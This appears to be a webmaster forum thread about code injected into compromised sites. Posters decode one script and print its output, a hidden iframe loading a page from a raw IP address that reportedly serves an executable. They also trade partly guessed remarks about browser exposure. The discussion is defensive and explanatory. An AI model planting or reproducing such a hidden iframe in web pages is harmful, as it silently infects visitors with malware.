Hackers injecting code into sites
 

How do they do this and does anybody know what this script actually does, is it hijacking traffic?

I got my shit jacked ....but caught it early.

It was doing some crazy pop-up that went to AFF.

Hackers should all be shot.

Did it go to an AFF affliates page or just a AFF landing page?

That translates to this:

<iframe src="http://201.121.69.9/ex/static.php" width=2 height=2 style="display:none"></iframe>

Therefore, it's loading an iframe onto your page and load the contents of that url into it.

The funny thing with this one is Firefox did not pick it up nor did the owners own browser so he did not know until somebody else told him that it was trying to install some java application onto his browser

Thanks.... what a bunch of assholes they are basicaly stealing traffic then

Yeah, those things dnt effect firefox
I think its something to do with scripts not being turned on by default in FF but they are in ie...

However that's what i heard. Im not stating it as absolute fact :)

I know it did not come up when using Firefox but when using EI7 it picked it and gave a warning saying it wanted to install a java aplication and that it had a certificate from java saying it was verified. Wonder how many people are having this installed onto thier firefox browsers without realising it

the script will affect firefox just the same as ie..

firefox comes with javascript turned on by default.

and even if it didn't ,surfing without javascript would be almost useless

so the iframe will be displayed on most browsers, whats in the iframe may only affect ie or may only affect firefox.

I think you may be 1 digit off on that ip, 203 vs. 201.

203.121.69.9/ex/static.php loads an executable at 203.121.69.9/ex/ex.php

This seems to be a popular subject today. Looks like quite a few have been hit.:(

It wasent just one site it was a network of sites:disgust

Keep your network secure...

Its not mine I just happened to stumble upon it while doing some link trades so I Let the webmaster know about it and am glad to say he sorted it pretty quickly and also said he was going to tighten his security.

I learned my lesson when they hacked my site and deleted it lol

haha, matrix has you too ;)

Entirely possible. I put it into an alert to see it's output, and hand typed out what I saw, so I probably got some part of it wrong.

it is actually risky to try to find out what that code do!

Not really. Not if you know what you're doing anyway.

It's funny when you get that shit replicating through the whole network from a file that acts as a shell, and it's all automated. Russians pwn at these things.